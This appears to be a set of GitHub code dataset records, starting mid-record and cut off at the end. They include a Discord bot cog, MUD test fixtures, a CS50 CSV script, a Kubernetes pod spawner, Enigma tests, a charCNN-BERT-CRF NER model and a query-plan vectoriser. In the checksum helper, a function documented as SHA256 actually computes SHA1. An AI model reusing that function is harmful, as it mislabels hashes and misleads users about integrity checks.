help=\"gives an 8-ball style answer to any question\")\n async def _8ball(self, ctx, *, question: str):\n responses = ['It is Certain.', \n 'It is decidedly so',\n 'Without a doubt.',\n 'Yes definitely.',\n 'You may rely on it.',\n 'As I see it, yes.',\n 'Most likely.',\n 'Ummm I guess...',\n 'Signs point to yes.',\n 'Reply hazy, try again.',\n 'Ask again later.',\n 'Better not tell you now.',\n 'Cannot predict now.',\n 'Concentrate and ask again.',\n \"Don't count on it.\",\n 'My reply is no.',\n 'My sources say no.',\n 'Outlook not so good.',\n 'Very doubtful.']\n await ctx.send(f'Question: {question}\\nAnswer: {random.choice(responses)}')\n \n @commands.command(help=\"replies with Pong!\")\n async def ping(self, ctx):\n await ctx.send(f'Pong!')\n\n @commands.command(help=\"replies with Polo!\")\n async def marco(self, 
ctx):\n await ctx.send(f'Polo!')\n\ndef setup(client):\n client.add_cog(Fun(client))","repo_name":"anavsingh99/discord-bot","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19099009722","text":"from pytest import fixture\n\nimport os\nimport os.path\n\nfrom autobahn.twisted import WebSocketServerFactory\n\nfrom mudmaker import Exit, Game, Room, Zone, WebSocketConnection, Object\nfrom mudmaker.socials import factory\n\n\n@fixture(name='exit')\ndef get_exit(game, zone):\n \"\"\"Get a new exit linking two rooms.\"\"\"\n location = game.make_object(\n 'Room', (Room,), name='Test Location', zone=zone\n )\n destination = game.make_object(\n 'Room', (Room,), name='Test Destination', zone=zone\n )\n return game.make_object(\n 'Exit', (Exit,), location=location, destination=destination,\n name='Test Exit', direction_name='n'\n )\n\n\n@fixture(name='game')\ndef get_game():\n \"\"\"Get a Game instance.\"\"\"\n g = Game('Test Game')\n g.account_store.filename = 'test-accounts.json'\n yield g\n if os.path.isfile(g.account_store.filename):\n os.remove(g.account_store.filename)\n\n\n@fixture(name='room')\ndef get_room(game, zone):\n return game.make_object('Room', (Room,), name='Test Room', zone=zone)\n\n\n@fixture(name='zone')\ndef get_zone(game):\n return game.make_object('Zone', (Zone,), name='Test Zone')\n\n\nclass PretendPeer:\n host = 'test.example.com'\n port = 1234\n\n\nclass PretendReason:\n def getErrorMessage(self):\n return 'Test conection was disconnected.'\n\n\nclass PretendTransport:\n def setTcpNoDelay(self, value):\n pass\n\n def getPeer(self):\n return PretendPeer()\n\n\nclass PretendConnection(WebSocketConnection):\n \"\"\"A pretend connection.\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.transport = PretendTransport()\n super().__init__(*args, **kwargs)\n self.messages = []\n\n @property\n def last_message(self):\n if self.messages:\n return self.messages[-1]\n return ''\n\n def send(self, *args, **kwargs):\n pass\n\n def message(self, string):\n self.messages.append(string)\n return super().message(string)\n\n\n@fixture(name='connection')\ndef get_connection(game):\n \"\"\"Provides a pretend conection object.\"\"\"\n game.websocket_factory = WebSocketServerFactory()\n game.websocket_factory.game = game\n con = PretendConnection()\n con.factory = game.websocket_factory\n con.onOpen()\n game.connections.append(con)\n yield con\n game.connections.remove(con)\n\n\n@fixture(name='obj')\ndef get_object(game):\n return game.make_object('Object', (Object,), name='Test Object')\n\n\n@fixture(name='accounts')\ndef get_accounts(game):\n \"\"\"Get an AccountStore instance.\"\"\"\n return game.account_store\n\n\n@fixture(name='yaml_filename', scope='session', autouse=True)\ndef get_filename():\n # Will be executed before the first test\n filename = 'test.yaml'\n yield filename\n if os.path.isfile(filename):\n os.remove(filename)\n\n\n@fixture(name='player')\ndef get_player(connection, game, accounts, obj):\n accounts.add_account('test', 'test', obj)\n game.finish_login(connection, obj)\n return obj\n\n\n@fixture(name='socials')\ndef get_socials():\n return factory\n","repo_name":"chrisnorman7/mudmaker","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71161650436","text":"# Run: pip 
install tabulate\n\nimport sys # Access command line arguments\nimport csv\nfrom tabulate import tabulate # prints a pretty ASCII format table\n\ndef main():\n check_command_line_args()\n # Check that the file exists before trying to display it\n try:\n with open(sys.argv[1], \"r\"):\n pass\n # File doesn't exist\n except FileNotFoundError:\n sys.exit(\"File does not exist\")\n # Read the CSV file and display the table\n display_csv_as_table(sys.argv[1])\n\ndef display_csv_as_table(file_path):\n with open(file_path, \"r\") as file:\n reader = csv.reader(file)\n table = list(reader)\n headers = table[0]\n print(tabulate(table[1:], headers, tablefmt=\"grid\"))\n\ndef check_command_line_args():\n # Check the number of elements given on the command line\n if len(sys.argv) < 2:\n sys.exit(\"Too few command-line arguments\")\n if len(sys.argv) > 2:\n sys.exit(\"Too many command-line arguments\")\n # Check if the file has a .csv extension\n if not sys.argv[1].endswith(\".csv\"):\n sys.exit(\"Not a CSV file\")\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n# Download pizza menu files via:\n# wget https://cs50.harvard.edu/python/2022/psets/6/pizza/sicilian.csv\n# wget https://cs50.harvard.edu/python/2022/psets/6/pizza/regular.csv\n\n# Run program as:\n# python pizza.py sicilian.csv / regular.csv","repo_name":"Stevecmd/CS50_python_2023","sub_path":"week06/pizza/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21020734834","text":"###############################################################################\r\n# #\r\n# This program is free software: you can redistribute it and/or modify #\r\n# it under the terms of the GNU General Public License as published by #\r\n# the Free Software Foundation, either version 3 of the License, or #\r\n# (at your option) any later version. #\r\n# #\r\n# This program is distributed in the hope that it will be useful, #\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\r\n# GNU General Public License for more details. #\r\n# #\r\n# You should have received a copy of the GNU General Public License #\r\n# along with this program. If not, see 
#\r\n# #\r\n###############################################################################\r\n\r\n__author__ = 'Donovan Parks'\r\n__copyright__ = 'Copyright 2015'\r\n__credits__ = ['Donovan Parks']\r\n__license__ = 'GPL3'\r\n__maintainer__ = 'Donovan Parks'\r\n__email__ = 'donovan.parks@gmail.com'\r\n\r\nimport hashlib\r\n\r\n\r\ndef sha256(input_file):\r\n \"\"\"Determine SHA256 hash for file.\r\n\r\n Parameters\r\n ----------\r\n input_file : str\r\n Name of file.\r\n\r\n Returns\r\n -------\r\n str\r\n SHA256 hash.\r\n \"\"\"\r\n\r\n BLOCKSIZE = 65536\r\n hasher = hashlib.sha1()\r\n with open(input_file, 'rb') as afile:\r\n buf = afile.read(BLOCKSIZE)\r\n while len(buf) > 0:\r\n hasher.update(buf)\r\n buf = afile.read(BLOCKSIZE)\r\n\r\n return hasher.hexdigest()\r\n","repo_name":"jtamames/SqueezeMeta","sub_path":"lib/biolib/checksum.py","file_name":"checksum.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"61"} +{"seq_id":"7858239478","text":"from __future__ import print_function\n\nimport os\nimport uuid\nfrom multiprocessing import Process\nimport time\nfrom bluelens_spawning_pool import spawning_pool\nfrom stylelens_product.products import Products\nfrom stylelens_product.crawls import Crawls\nimport redis\nimport pickle\n\nfrom bluelens_log import Logging\n\nREDIS_SERVER = os.environ['REDIS_SERVER']\nREDIS_PASSWORD = os.environ['REDIS_PASSWORD']\nRELEASE_MODE = os.environ['RELEASE_MODE']\nDB_PRODUCT_HOST = os.environ['DB_PRODUCT_HOST']\nDB_PRODUCT_PORT = os.environ['DB_PRODUCT_PORT']\nDB_PRODUCT_USER = os.environ['DB_PRODUCT_USER']\nDB_PRODUCT_PASSWORD = os.environ['DB_PRODUCT_PASSWORD']\nDB_PRODUCT_NAME = os.environ['DB_PRODUCT_NAME']\nAWS_ACCESS_KEY = os.environ['AWS_ACCESS_KEY'].replace('\"', '')\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY'].replace('\"', '')\n\nMAX_PROCESS_NUM = int(os.environ['MAX_PROCESS_NUM'])\n\nREDIS_HOST_CLASSIFY_QUEUE = 'bl:host:classify:queue'\nREDIS_PRODUCT_IMAGE_PROCESS_QUEUE = 'bl:product:image:process:queue'\nREDIS_CRAWL_VERSION = 'bl:crawl:version'\nREDIS_CRAWL_VERSION_LATEST = 'latest'\n\nSPAWNING_CRITERIA = 50\nPROCESSING_TERM = 60\n\noptions = {\n 'REDIS_SERVER': REDIS_SERVER,\n 'REDIS_PASSWORD': REDIS_PASSWORD\n}\nlog = Logging(options, tag='bl-image-process')\nrconn = redis.StrictRedis(REDIS_SERVER, port=6379, password=REDIS_PASSWORD)\n\ndef get_latest_crawl_version(rconn):\n value = rconn.hget(REDIS_CRAWL_VERSION, REDIS_CRAWL_VERSION_LATEST)\n if value is None:\n return None\n\n log.debug(value)\n try:\n version_id = value.decode(\"utf-8\")\n except Exception as e:\n log.error(str(e))\n version_id = None\n return version_id\n\ndef cleanup_products(host_code, version_id):\n global product_api\n try:\n res = product_api.delete_products_by_hostcode_and_version_id(host_code, version_id,\n except_version=True)\n log.debug(res)\n except Exception as e:\n log.error(e)\n\ndef clear_product_queue(rconn):\n rconn.delete(REDIS_PRODUCT_IMAGE_PROCESS_QUEUE)\n\ndef push_product_to_queue(product):\n rconn.lpush(REDIS_PRODUCT_IMAGE_PROCESS_QUEUE, pickle.dumps(product))\n\ndef query(host_code, version_id):\n global product_api\n log.info('start query: ' + host_code)\n\n spawn_counter = 0\n\n q_offset = 0\n q_limit = 500\n\n try:\n while True:\n res = product_api.get_products_by_hostcode_and_version_id(host_code, version_id,\n is_processed=False,\n offset=q_offset, limit=q_limit)\n for p in res:\n push_product_to_queue(p)\n\n if len(res) == 0:\n break\n 
else:\n q_offset = q_offset + q_limit\n\n except Exception as e:\n log.error(str(e) + ':' + host_code)\n\n\ndef spawn(uuid):\n log.debug('RELEASE_MODE:' + RELEASE_MODE)\n\n pool = spawning_pool.SpawningPool()\n\n project_name = 'bl-image-processor-' + uuid\n log.debug('spawn_image-processor: ' + project_name)\n\n pool.setServerUrl(REDIS_SERVER)\n pool.setServerPassword(REDIS_PASSWORD)\n pool.setApiVersion('v1')\n pool.setKind('Pod')\n pool.setMetadataName(project_name)\n pool.setMetadataNamespace(RELEASE_MODE)\n pool.addMetadataLabel('name', project_name)\n pool.addMetadataLabel('group', 'bl-image-processor')\n pool.addMetadataLabel('SPAWN_ID', uuid)\n container = pool.createContainer()\n pool.setContainerName(container, project_name)\n pool.addContainerEnv(container, 'AWS_ACCESS_KEY', AWS_ACCESS_KEY)\n pool.addContainerEnv(container, 'AWS_SECRET_ACCESS_KEY', AWS_SECRET_ACCESS_KEY)\n pool.addContainerEnv(container, 'REDIS_SERVER', REDIS_SERVER)\n pool.addContainerEnv(container, 'REDIS_PASSWORD', REDIS_PASSWORD)\n pool.addContainerEnv(container, 'SPAWN_ID', uuid)\n pool.addContainerEnv(container, 'MAX_PROCESS_NUM', str(MAX_PROCESS_NUM))\n pool.addContainerEnv(container, 'RELEASE_MODE', RELEASE_MODE)\n pool.addContainerEnv(container, 'DB_PRODUCT_HOST', DB_PRODUCT_HOST)\n pool.addContainerEnv(container, 'DB_PRODUCT_PORT', DB_PRODUCT_PORT)\n pool.addContainerEnv(container, 'DB_PRODUCT_USER', DB_PRODUCT_USER)\n pool.addContainerEnv(container, 'DB_PRODUCT_PASSWORD', DB_PRODUCT_PASSWORD)\n pool.addContainerEnv(container, 'DB_PRODUCT_NAME', DB_PRODUCT_NAME)\n pool.setContainerImage(container, 'bluelens/bl-image-processor:' + RELEASE_MODE)\n pool.setContainerImagePullPolicy(container, 'Always')\n pool.addContainer(container)\n pool.setRestartPolicy('Never')\n pool.spawn()\n\ndef dispatch(rconn, version_id):\n global product_api\n\n size = rconn.llen(REDIS_PRODUCT_IMAGE_PROCESS_QUEUE)\n\n if size > 0 and size < MAX_PROCESS_NUM:\n for i in range(10):\n spawn(str(uuid.uuid4()))\n # time.sleep(60*60*2)\n\n if size >= MAX_PROCESS_NUM and size < MAX_PROCESS_NUM * 10:\n for i in range(100):\n spawn(str(uuid.uuid4()))\n # time.sleep(60*60*5)\n\n elif size >= MAX_PROCESS_NUM * 100:\n for i in range(500):\n spawn(str(uuid.uuid4()))\n # time.sleep(60*60*10)\n\ndef clear_dbs(version_id):\n remove_old_products(version_id)\n\n\ndef remove_old_products(version_id):\n global product_api\n\n try:\n res = product_api.delete_old_products(version_id)\n except Exception as e:\n log.error(str(e))\n\ndef remove_prev_pods():\n pool = spawning_pool.SpawningPool()\n pool.setServerUrl(REDIS_SERVER)\n pool.setServerPassword(REDIS_PASSWORD)\n pool.setMetadataNamespace(RELEASE_MODE)\n data = {}\n data['namespace'] = RELEASE_MODE\n data['key'] = 'group'\n data['value'] = 'bl-image-processor'\n pool.delete(data)\n time.sleep(60)\n\ndef prepare_products(rconn, version_id):\n global product_api\n offset = 0\n limit = 200\n\n clear_product_queue(rconn)\n clear_dbs(version_id)\n remove_prev_pods()\n try:\n log.info('prepare_products')\n while True:\n res = product_api.get_products_by_version_id(version_id=version_id,\n is_processed=False,\n offset=offset,\n limit=limit)\n\n log.debug(\"Got \" + str(len(res)) + ' products')\n for product in res:\n push_product_to_queue(product)\n\n if len(res) == 0:\n break\n else:\n offset = offset + limit\n\n except Exception as e:\n log.error(str(e))\n\ndef check_condition_to_start(version_id):\n global product_api\n\n product_api = Products()\n crawl_api = Crawls()\n\n try:\n 
log.info(\"check_condition_to_start\")\n\n # Check if image processing queue is empty\n queue_size = rconn.llen(REDIS_PRODUCT_IMAGE_PROCESS_QUEUE)\n if queue_size != 0:\n return False\n\n # Check if crawling process is done\n total_crawl_size = crawl_api.get_size_crawls(version_id)\n crawled_size = crawl_api.get_size_crawls(version_id, status='done')\n if total_crawl_size != crawled_size:\n return False\n\n # Check if all images are processed\n total_product_size = product_api.get_size_products(version_id)\n available_product_size = product_api.get_size_products(version_id, is_available=True)\n unavailable_product_size = product_api.get_size_products(version_id, is_available=False)\n # processed_size = product_api.get_size_products(version_id, is_processed=True)\n\n if (available_product_size + unavailable_product_size) == total_product_size:\n return False\n\n\n except Exception as e:\n log.error(str(e))\n\n return True\n\ndef start(rconn):\n while True:\n version_id = get_latest_crawl_version(rconn)\n if version_id is not None:\n log.info(\"check_condition_to_start\")\n ok = check_condition_to_start(version_id)\n log.info(\"check_condition_to_start: \" + str(ok))\n if ok is True:\n prepare_products(rconn, version_id)\n dispatch(rconn, version_id)\n time.sleep(60*10)\n\nif __name__ == '__main__':\n log.info('Start bl-image-process:3')\n try:\n Process(target=start, args=(rconn,)).start()\n except Exception as e:\n log.error(str(e))\n","repo_name":"BlueLens/bl-image-process","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32758361533","text":"import string\nfrom enigma.utils import Letter, Pair\n\n\ndef test_letter_from_str():\n tests = []\n for i in range(26):\n character = string.ascii_lowercase[i]\n index = i\n tests.append({\"letter\": character, \"index\": index})\n\n for test in tests:\n letter = Letter(test[\"letter\"])\n assert letter.letter == test[\"letter\"] and letter.index == test[\"index\"]\n\n\ndef test_letter_from_index():\n tests = []\n for i in range(26):\n character = string.ascii_lowercase[i]\n index = i\n tests.append({\"letter\": character, \"index\": index})\n\n for test in tests:\n letter = Letter(test[\"index\"])\n assert letter.letter == test[\"letter\"] and letter.index == test[\"index\"]\n\n\ndef test_pairs():\n tests = [\n {\"pair\": {\"A\": \"x\", \"B\": \"c\"}, \"off\": \"t\"},\n {\"pair\": {\"A\": \"r\", \"B\": \"t\"}, \"off\": \"g\"},\n {\"pair\": {\"A\": \"r\", \"B\": \"t\"}, \"off\": \"l\"},\n ]\n\n for test in tests:\n p = test[\"pair\"]\n pair = Pair(p[\"A\"], p[\"B\"])\n\n a = Letter(p[\"A\"])\n b = Letter(p[\"B\"])\n off = Letter(test[\"off\"])\n\n assert(pair.get(a) == b and pair.get(b) == a and pair.get(off) == None)\n","repo_name":"raymas/enigma-cipher-machine","sub_path":"tests/utils_tests.py","file_name":"utils_tests.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22584297334","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom bert import modeling\nimport tokenization_ner\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib import crf\nfrom tensorflow.contrib.layers.python.layers import initializers\n\nDTYPE = tf.float32\nDTYPE_INT = tf.int32\n\n\nclass charBERT(object):\n def 
__init__(self,\n bert_config, char_config,\n is_training, # is_evaluation,\n input_token_ids, input_char_ids,\n labels, num_labels, use_char_representation=True,\n input_mask=None, segment_ids=None,\n use_one_hot_embeddings=False, # TPU加速则为True\n scope=None):\n \"\"\"\n\n :param bert_config:\n :param char_config:\n :param is_training: 处于estimator模式下的train模式\n :param is_evaluation: 处于estimator模式下的evaluate模式\n :param input_token_ids:\n :param input_char_ids:\n :param labels: 真实标签\n :param num_labels: 标签个数,用于CRF的转移矩阵\n :param input_mask:\n :param segment_ids: 用于Bert,不过这里没啥用处,因为只是处理一个ner的问题,所以bert默认都为0\n :param use_one_hot_embeddings: 是否用tpu\n :param scope:\n \"\"\"\n self.bert_model = modeling.BertModel(config=bert_config,\n is_training=is_training,\n input_ids=input_token_ids,\n input_mask=input_mask,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_one_hot_embeddings)\n self.token_output = self.bert_model.get_sequence_output()\n\n if use_char_representation:\n char_embed_dim = char_config['char_embed_dim']\n filters = char_config['filters']\n alphabet_size = char_config['alphabet_size']\n activations = char_config['activations']\n n_highway = char_config['n_highway']\n projection_dim = char_config['projection_dim']\n char_dropout_rate = char_config['char_dropout_rate'] if is_training else 1.0\n\n self.charcnn_model = CharRepresentation(char_input=input_char_ids,\n alphabet_size=alphabet_size,\n filters=filters,\n projection_dim=projection_dim,\n char_embed_dim=char_embed_dim,\n activations=activations,\n n_highway=n_highway,\n dropout_rate=char_dropout_rate\n )\n self.char_output = self.charcnn_model.get_highway_output()\n\n token_shape = modeling.get_shape_list(self.token_output, expected_rank=3)\n char_shape = modeling.get_shape_list(self.char_output, expected_rank=3)\n\n if token_shape[1] != char_shape[1]:\n raise ValueError(\n \"The time steps of token representation (%d) is not the same as char representation (%d) \"\n % (token_shape[1], char_shape[1]))\n\n self.final_output = tf.concat([self.token_output, self.char_output], axis=-1)\n else:\n tf.logging.info(\"****************BERT representation only***************\")\n self.final_output = self.token_output\n\n sequece_lengths = tf.reduce_sum(input_mask, axis=-1)\n self.crf = CRF(input=self.final_output,\n labels=labels,\n num_labels=num_labels,\n lengths=sequece_lengths,\n is_training=is_training,\n # is_evaluation=is_evaluation # estimator模式下的evaluate模式还是需要返回损失函数的\n )\n\n def get_crf_loss(self):\n return self.crf.crf_loss()\n\n def get_orig_loss(self):\n return self.crf.orig_loss()\n\n def get_crf_preds(self):\n return self.crf.get_crf_decode_tags()\n\n def get_orig_preds(self):\n return self.crf.get_orig_tags()\n\n\nclass CRF(object):\n def __init__(self, input, labels, num_labels,\n lengths, is_training, dropout_rate=0.7):\n \"\"\"\n\n :param input:\n :param labels:\n :param num_labels: label的种类数,因为CRF是状态转移,因此label为一个状态\n :param lengths: batch中每个句子的实际长度\n :param is_training:\n :param dropout_rate:\n \"\"\"\n self.labels = labels\n self.num_labels = num_labels\n\n if is_training:\n input = tf.nn.dropout(input, dropout_rate)\n # project\n self.logits = self._project_layer(input, num_labels)\n if is_training:\n self.logits = tf.nn.dropout(self.logits, dropout_rate)\n # crf\n self.log_likelihood, self.trans = self._crf_log_likelihood(self.labels, self.logits, lengths, num_labels)\n # CRF decode, pred_ids 是一条最大概率的标注路径\n self.pred_ids, _ = crf.crf_decode(potentials=self.logits, transition_params=self.trans, 
sequence_length=lengths)\n\n def _project_layer(self, input, num_labels, name=None):\n \"\"\"\n :param outputs: [batch_size, num_steps, emb_size]\n :return: [batch_size, num_steps, num_tags]\n \"\"\"\n hidden_state = input.get_shape()[-1]\n seq_length = input.get_shape()[-2]\n with tf.variable_scope(\"project\" if not name else name):\n # project to score of tags\n with tf.variable_scope(\"logits\"):\n W = tf.get_variable(\"W\", shape=[hidden_state, num_labels],\n dtype=tf.float32, initializer=initializers.xavier_initializer())\n\n b = tf.get_variable(\"b\", shape=[num_labels], dtype=tf.float32,\n initializer=tf.zeros_initializer())\n\n hidden_ouput = tf.reshape(input,[-1, hidden_state])\n pred = tf.nn.xw_plus_b(hidden_ouput, W, b)\n return tf.reshape(pred, [-1, seq_length, num_labels])\n\n def _crf_log_likelihood(self, labels, logits, lengths, num_labels):\n \"\"\"\n calculate crf loss\n :param project_logits: [1, num_steps, num_tags]\n :return: scalar loss\n \"\"\"\n with tf.variable_scope(\"crf_loss\"):\n trans = tf.get_variable(\n \"transitions\",\n shape=[num_labels, num_labels],\n initializer=initializers.xavier_initializer())\n log_likelihood, trans = tf.contrib.crf.crf_log_likelihood(\n inputs=logits,\n tag_indices=labels,\n transition_params=trans,\n sequence_lengths=lengths)\n # return tf.reduce_mean(-log_likelihood), trans\n return log_likelihood, trans\n\n def crf_loss(self):\n return tf.reduce_mean(-self.log_likelihood)\n\n def orig_loss(self):\n self.labels = tf.one_hot(indices = self.labels, depth = self.num_labels)\n self.loss_per_loc = tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.labels,\n logits=self.logits,\n dim=-1)\n return tf.reduce_mean(tf.reduce_sum(self.loss_per_loc, axis=-1), # 每个example的每个位置tag的损失,再加起来\n axis=-1)\n\n def get_crf_decode_tags(self):\n return self.pred_ids\n\n def get_orig_tags(self):\n return tf.argmax(self.logits, axis=-1)\n\n\nclass CharRepresentation(object):\n def __init__(self, char_input, alphabet_size, filters,\n char_embed_dim, projection_dim, activations='tanh',\n n_highway=None, dropout_rate=0.7):\n\n char_length = char_input.get_shape().as_list()[2]\n sequence_length = char_input.get_shape().as_list()[1]\n batch_size = char_input.get_shape().as_list()[0]\n\n with tf.name_scope(\"Char_Embedding\"), tf.device('/cpu:0'):\n self.embedding_weights = tf.get_variable( # 为每个字符形成的嵌入表\n \"char_embed\", [alphabet_size, char_embed_dim], dtype=DTYPE,\n initializer=tf.random_uniform_initializer(-1.0, 1.0))\n # shape (batch_size, unroll_steps, max_chars, embed_dim)\n self.char_embedding = tf.nn.embedding_lookup(self.embedding_weights,\n char_input)\n\n # for first model, this is False, for others it's True\n n_filters = sum(f[1] for f in filters)\n reuse = tf.get_variable_scope().reuse\n self.sequence_output = add_char_convolution(self.char_embedding, filters, activations, reuse)\n\n use_highway = n_highway is not None and n_highway > 0\n use_proj = n_filters != projection_dim\n if use_highway or use_proj:\n self.sequence_output = tf.reshape(self.sequence_output, [-1, n_filters])\n\n if use_highway:\n self.sequence_output = highway(self.sequence_output, n_highway)\n\n # set up weights for projection\n if use_proj:\n assert n_filters > projection_dim\n with tf.variable_scope('CNN_proj') as scope:\n W_proj_cnn = tf.get_variable(\n \"W_proj\", [n_filters, projection_dim],\n initializer=tf.random_normal_initializer(\n mean=0.0, stddev=np.sqrt(1.0 / n_filters)),\n dtype=DTYPE)\n b_proj_cnn = tf.get_variable(\n \"b_proj\", [projection_dim],\n 
initializer=tf.constant_initializer(0.0),\n dtype=DTYPE)\n self.sequence_output = tf.matmul(self.sequence_output, W_proj_cnn) + b_proj_cnn\n\n if use_highway or use_proj:\n orig_shape = [-1, sequence_length, projection_dim]\n self.sequence_output = tf.reshape(self.sequence_output, orig_shape)\n self.sequence_output = tf.nn.dropout(self.sequence_output, dropout_rate)\n\n def get_embedding_output(self):\n return self.char_embedding\n\n def get_highway_output(self):\n return self.sequence_output\n\n\ndef add_char_convolution(input, filters, activations, reuse):\n # input shape (batch_size, unroll_steps, max_chars, embed_dim)\n char_embed_dim = input.get_shape().as_list()[-1]\n char_length = input.get_shape().as_list()[-2]\n with tf.variable_scope(\"CNN\", reuse=reuse):\n convolutions = []\n for i, (width, num_filters) in enumerate(filters):\n if activations == 'relu':\n # He initialization for ReLU activation\n # with char embeddings init between -1 and 1\n # w_init = tf.random_normal_initializer(\n # mean=0.0,\n # stddev=np.sqrt(2.0 / (width * char_embed_dim))\n # )\n\n # Kim et al 2015, +/- 0.05\n w_init = tf.random_uniform_initializer(\n minval=-0.05, maxval=0.05)\n activation = tf.nn.relu\n elif activations == 'tanh':\n # glorot init\n w_init = tf.random_normal_initializer(\n mean=0.0,\n stddev=np.sqrt(1.0 / (width * char_embed_dim))\n )\n activation = tf.nn.tanh\n w = tf.get_variable( # 一个一维的卷积\n \"W_cnn_%s\" % i,\n # height, width, in_channel, out_channel, 这里的height设为1,因为只考虑一个单词内的字母排列,width为每次考虑width个字母\n # 后续卷积后的shape为(batch_size, sequence_length, char_length - width + 1, num_filters)\n [1, width, char_embed_dim, num_filters],\n initializer=w_init,\n dtype=DTYPE)\n b = tf.get_variable( # out_channel\n \"b_cnn_%s\" % i, [num_filters], dtype=DTYPE,\n initializer=tf.constant_initializer(0.0))\n\n conv = tf.nn.conv2d( # 卷积,从左到右\n input, w,\n strides=[1, 1, 1, 1],\n padding=\"VALID\") + b\n # now max pool\n # 使用一个max pool,每一行进行pooling\n # 取这些字母卷积后,最耀眼的一个位置,因此max_pool以后shape为(batch_size, sequence_length, 1, num_filters)\n # 这里可否把max_pool换成一个层叠卷积呢?\n conv = tf.nn.max_pool(\n conv, [1, 1, char_length - width + 1, 1],\n [1, 1, 1, 1], 'VALID')\n\n # activation\n conv = activation(conv)\n conv = tf.squeeze(conv, squeeze_dims=[2])\n\n convolutions.append(conv)\n\n return tf.concat(convolutions, 2)\n\ndef add_char_recurrent(input, filters, activations, reuse, bidirectional):\n pass\n\n\n# 参考highway网络的定义\ndef highway(input, n_highway):\n highway_dim = input.get_shape().as_list()[-1]\n sequence_length = input.get_shape().as_list()[-2]\n for i in range(n_highway):\n with tf.variable_scope('high_%s' % i) as scope:\n W_carry = tf.get_variable( # 这些都是get_variable\n 'W_carry', [highway_dim, highway_dim],\n # glorit init\n initializer=tf.random_normal_initializer(\n mean=0.0, stddev=np.sqrt(1.0 / highway_dim)),\n dtype=DTYPE)\n b_carry = tf.get_variable(\n 'b_carry', [highway_dim],\n initializer=tf.constant_initializer(-2.0),\n dtype=DTYPE)\n W_transform = tf.get_variable(\n 'W_transform', [highway_dim, highway_dim],\n initializer=tf.random_normal_initializer(\n mean=0.0, stddev=np.sqrt(1.0 / highway_dim)),\n dtype=DTYPE)\n b_transform = tf.get_variable(\n 'b_transform', [highway_dim],\n initializer=tf.constant_initializer(0.0),\n dtype=DTYPE)\n input = tf.reshape(input, [-1, highway_dim])\n\n carry = tf.matmul(input, W_carry) + b_carry\n carry_gate = tf.nn.sigmoid(carry)\n\n transform = tf.matmul(input, W_transform) + b_transform\n transform_gate = tf.nn.relu(transform)\n\n return carry_gate * 
transform_gate + (1.0 - carry_gate) * input\n\n\n\n\n\n","repo_name":"Zhengxuru/charCNN-BERT-CRF","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14668,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"15650830407","text":"# Description: 主要是获取redis中AQP的DFS node, 然后调用两层sent2vec模型, 最后求vector之间的欧式距离\nimport os\nimport redis\nimport numpy as np\nfrom dictfile.read_dict import get_AQP_node_dict\nfrom dictfile.read_dict import read_rule_file\nfrom sent2vec import Word\nfrom sent2vec import Sentence\nfrom sent2vec import sentence_to_vec\nfrom sklearn import preprocessing\nimport collections\nimport time\n\n\nclass AQP:\n def __init__(self, id, key, statement, vector):\n self.id = id # AQP的自增ID\n self.key = key # Id\n self.statement = statement # 由sent2vec中的Word实例(node index:vector)序列够成\n self.vector = vector # 初始为空,后续补充为该method对应的sentence vector\n self.distance = -1.0 # AQP与QEP之间的向量距离\n self.distance_norm = -1.0 # 归一化后的距离\n\n\ndef getAQPWords(nodes):\n \"\"\"\n 对于给定method的每个node,根据node index在node-vec字典中找到其对应的vector,调用sent2vec中的Word构造函数,并将Word实例加入到该method对应的Word序列method_vec_list\n :param nodes:\n :return:\n \"\"\"\n AQP_node_vec_list = []\n for index in nodes:\n if index in AQP_node_dict.keys():\n word_list.append(index)\n word = Word(index, AQP_node_dict[index])\n AQP_node_vec_list.append(word)\n return AQP_node_vec_list\n\n\ndef getRedisAQPs():\n \"\"\"\n 为redis数据库中收集的每个method(key:value),以method的id、key、line、Word序列构建Method实例,并得到Method实例序列\n :return:\n \"\"\"\n AQPs = []\n for i in range(data_size):\n key = keys[i].decode()\n # 将redis中的一个AQP分解为多个node,分隔符为`,`\n node_seq = jedis.get(keys[i]).decode().split(\",\")\n AQP_nodes = list(node_seq)\n vector = []\n # 调用sent2vec,得到该method_i对应的Word序列,组成statement\n statement = getAQPWords(AQP_nodes)\n # 构建Method实例\n aqp = AQP(i, key, statement, vector)\n AQPs.append(aqp)\n return AQPs\n\n\ndef get_word_counts(word_list):\n word_counts = collections.Counter(word_list)\n return word_counts\n\n\ndef get_word_frequency(word_text, word_counts, word_list_len):\n word_count = word_counts.get(word_text)\n if (word_count != None):\n # print(word_text, word_count, word_list_len)\n return (word_counts.get(word_text) * 1.0 / (word_list_len * 1.0))\n else:\n return 1.0\n\n\ndef getWordFrequencyDict(word_list):\n \"\"\"\n 根据\n :param word_list:\n :return:\n \"\"\"\n word_counts = get_word_counts(word_list)\n word_list_len = 